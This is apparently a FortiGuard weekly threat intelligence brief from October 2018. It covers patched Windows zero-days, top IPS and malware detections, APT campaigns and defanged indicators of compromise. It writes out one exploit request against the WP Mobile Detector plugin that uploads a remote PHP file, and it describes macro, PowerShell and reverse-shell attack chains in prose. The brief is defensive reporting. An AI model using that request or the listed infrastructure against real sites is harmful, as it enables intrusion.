|
Activity Summary - Week Ending October 12, 2018
A zero-day bug being actively exploited in the wild was patched by Microsoft this week. CVE-2018-8453 addresses an elevation of privilege flaw in the way that Win2K handles drivers, thereby allowing bad actors to run their code with kernel mode access. This would allow the attacker to install programs, create new accounts, create, modify and/or delete data with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how Win32k handles objects in memory.
The bad actor in this case is attributed to APT group FruityArmor, a Middle East-based group with a history of targeting Windows zero-days. The group has notoriously carried out targeted attacks exploiting 0-days to escape browser-based sandboxes to execute their malicious code.
Fortinet's IPS signature is: MS.Windows.CVE-2018-8453.Privilege.Escalation
Another zero-day bug was patched this month as well. This one, too, should require your immediate attention. CVE-2018-8423 addresses a Microsoft JET Database Engine 0-day that was publically, and irresponsibly, disclosed in September, along with sample exploit code. If exploited, the remote code execution vulnerability could allow the attacker full control of a system. To exploit the vulnerability, a user must open/import a specially crafted Microsoft JET Database Engine file. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user, and then convince the user to open the file. The security update addresses the vulnerability by modifying how the Microsoft JET Database Engine handles objects in memory.
Fortinet's IPS signature is:
MS.JET.DB.Engine.Page.Parsing.Out.of.Bound.Memorry.Corruption
Application Vulnerabilities / IPS
|
Rank
|
Name
|
Prevalence
|
|
1
|
MS.IIS.WebDAV.PROPFIND.ScStoragePathFromUrl.Buffer.Overflow
|
41,495
|
|
2
|
D-Link.DSL-2750B.CLI.OS.Command.Injection
|
20,031
|
|
3
|
Avtech.Devices.HTTP.Request.Parsing.Multiple.Vulnerabilities
|
18,604
|
|
4
|
Dasan.GPON.Remote.Code.Execution
|
18,218
|
|
5
|
Dahua.IP.Camera.Unauthorized.File.Access.Information.Disclosure
|
17,602
|
WordPress.WP.Mobile.Detector.Arbitrary.File.Upload – WP Mobile Detector Plugin automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme for users on such devices. A vulnerability exists in both resize.php and timthumb.php in versions <= 3.5 of this plugin. For example, an attacker can craft a simple HTTP post request to "POST /wp-content/plugins/wp-mobile-detector/resize.php payload:src=hxxp://site[.]domain/mig/tmp/css.php" to upload data. This is only possible because the vulnerable function does not validate or sanitize input from untrusted sources. Today, this plugin is no longer supported and the final version is 3.9. We are seeing increased activity regarding the exploitation of this vulnerability with close to 3% of sensors worldwide picking up on traffic aiming to exploit this issue.
Signatures: WordPress.WP.Mobile.Detector.Arbitrary.File.Upload
XAttacker.Tool.WebApp.Plugins.Arbitrary.File.Upload – This is a signature that identifies exploit traffic being generated by the XAttacker tool specifically trying to exploit arbitrary file upload vulnerabilities. This tool was just recently released and compiles exploits for web based content management systems (CMS) services, like Drupal, Joomla, and WordPress and is becoming increasingly popular due to its relative ease of use and extensive list of supported exploitation targets. As with all file upload vulnerabilities, a user has to pass this file as an argument and later call an http request to get this file executed, and our IPS signature will detect this anomalous behavior. Based on our telemetry, we have this signature in the top 100 exploitation attempts, with close to 2% of all sensors picking up traffic worldwide that matches the specifications of the detection.
Signatures: XAttacker.Tool.WebApp.Plugins.Arbitrary.File.Upload
Malware Activity
|
Rank
|
Name
|
Prevalence
|
|
1
|
Android/Agent.FJ!tr
|
8,965
|
|
2
|
W32/Agent.AJFK!tr
|
3,281
|
|
3
|
Adware/Agent
|
2,359
|
|
4
|
Riskware/CoinHive
|
1,963
|
|
5
|
W32/GenKryptik.CNGX!tr
|
1,741
|
Muddy Waters is Back! – FortiGuard Labs is aware of a cyber-campaign called MuddyWater, which is an APT that has resurfaced as of late. Discovered in 2017 by researchers, this threat actor has been active in the Middle East but has been seen attacking targets in Europe and the United States as well. The group's modus operandi is to attack various outfits using spear-phishing attacks targeting educational, military, telecom, and governmental institutions in the Middle East. Victims will receive a document that is carefully crafted and contains information that is specific to the targeted region, meaning that documents are not only crafted for regional, language, and local specific entities but also have the look and feel originating out of an existing official governmental entity. These documents also contain malicious macros that activate a fake text box. The macro will then download three files into the "ProgramData" folder, and it will also add a registry entry in the current user's RUN key (HKCU) for persistence. The files dropped by the macro are various format extensions and end in either INF, SCT, and TXT files or VBS and TXT files. Once these files decode on the victim machine, they will spawn a PowerShell process that consumes the Base64 encoded file. After this, PowerShell will turn off Office macro warnings, which allows it to access internal VBA objects for further penetration. Once the connection to the C2 is made, it can do the following: take screenshots, receive additional PowerShell instructions that instruct Excel to perform a second-stage attack via Excel and DDE, and receive another command to receive another PowerShell instruction via Explorer and COM to interact and execute it. Furthermore, it can perform downloads from the C2 server, wipe hard drives located at C, D, E, and F, and finally shut down and restart the system
Signatures: VBA/Agent.AFFE!tr, VBA/Dloader.GRI!tr, VBA/Agent.UFWF!tr, W32/Python_Stealer.C!tr.pws, VBA/Agent.6B7D!tr.dldr, Riskware/Credstealer, VBA/Agent.GFQ!tr, VBA/TrojanDropper.AAF!tr, VBA/TrojanDropper.ZG!tr, Riskware/Shootback, VBA/Agent.BAC4!tr, VBA/Agent.YU!tr, VBA/Agent.GRG!tr
Indicator(s):
alibabacloud[.]dynamic-dns[.]net
alibabacloud[.]wikaba[.]com
alibabacloud[.]zzux[.]com
microsoftofice[.]zyns[.]com
microword[.]itemdb[.]com
moffice[.]mrface[.]com
muonline[.]dns04[.]com
office[.]otzo[.]com
offlce[.]dnset[.]com
online[.]ezua[.]com
muhacirder[.]com
muteciyar[.]info
Not Gallbladder or Gallstone, but Gallmaker! – In conjunction with the Cyber Threat Alliance (CTA), Symantec has published a blog on a nation-state actor that they've discovered called Gallmaker. Gallmaker is an APT group that primarily targets Eastern European countries and the Middle East (EMEA) regions, specifically, embassies in Eastern Europe and military and defense outfits in the Middle East. Because of our membership in the CTA, we were able to have coverage and protections in place before this announcement was made.
The observed distribution method by Gallmaker is via a spear-phishing campaign, which uses Dynamic Data Exchange (DDE) in a carefully crafted, weaponized Microsoft Office file in an attempt to infect the victim with malware. Microsoft has stated in the past that DDE is not a vulnerability but a feature in Microsoft Office. Because of observations from researchers and the field, and the fact that by default DDE is turned on, Microsoft was forced out of goodwill to provide an update late last year that disables DDE by default.
Attackers know that many organizations are slow to update, and therefore even though there is a patch available to disable DDE for almost a year now, the attack was successful because of this reason.
The observations made by Symantec are pretty straightforward. Once the intended victim opens the Microsoft Office document, the Office document then runs DDE, which then executes PowerShell, which then runs obfuscated shellcode, to download a reverse shell. Another exfiltration tactic identified by Symantec is the use of a legitimate copy of WinZip, which may allow various data to be exfiltrated to the attacker. Also, a tool from GitHub, the Rex PowerShell repository, allows for the creation and manipulation of PowerShell to be used in conjunction with Metasploit.
Signatures: WM/Agent.15E8!tr.dldr, MSOffice/DdeExec.K!tr.dldr, Data/Gallmaker.A!tr, W32/Snojan.BMWL!tr, VBA/Agent!tr, WM/Agent.4916!tr, WM/Agent.HE!tr
Indicator(s):
5[.]223[.]98[.]157
45[.]55[.]154[.]23
87[.]17[.]148[.]117
87[.]17[.]148[.]76
93[.]109[.]241[.]154
82[.]202[.]120[.]156
111[.]90[.]149[.]99
Web Filtering Activity
Indicators of Compromise for Malware Used by APT28 – Recently the FortiGuard Labs Web Filtering team has been observing APT28, who use a number of tools to attack its targets. The group began to use a Unified Extensible Firmware Interface (UEFI) rootkit known as Lojax. This tracking system is capable of hijacking the machine with the ability to execute malicious code on the target's system. The rootkit allows attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled. The X-Agent tool, also known as "Chopstick," runs on Windows, iOS, and Unix-based operating systems, which includes keylogging and file extraction. X-Tunnel is a network tunneling tool that is used for network traversal and pivoting where it provides a secure tunnel to an external C2 server. X-Agent is likely seen to be connected with X-Tunnel and Computrace/LoJack which are legitimate programs, hence the campaign called Lojax. Meanwhile, the Zebrocy tool was observed since 2015 being involved in spear-phishing emails, in which the payload runs systeminfo and tasklist and also takes a screenshot. Last but not least, X-Tunnel, a networking tool that provides a secure tunnel to an external C2 server whereby the threat actor can use various networking tools and protocols to connect back to the attacker's service.
The FortiGuard Labs Web Filtering team has reviewed and blacklisted all associated IOCs.
Indicator(s):
bbcweather[.]org
beststreammusic[.]com
brownvelocity[.]org
coindmarket[.]com
creekcounty[.]net
daysheduler[.]org
185[.]181[.]102[.]201
179[.]43[.]158[.]20
85[.]204[.]124[.]77
185[.]183[.]107[.]40
Source : https://fortiguard.com/resources/threat-brief/2018/10/12/fortiguard-threat-intelligence-brief-october-12-2018
|
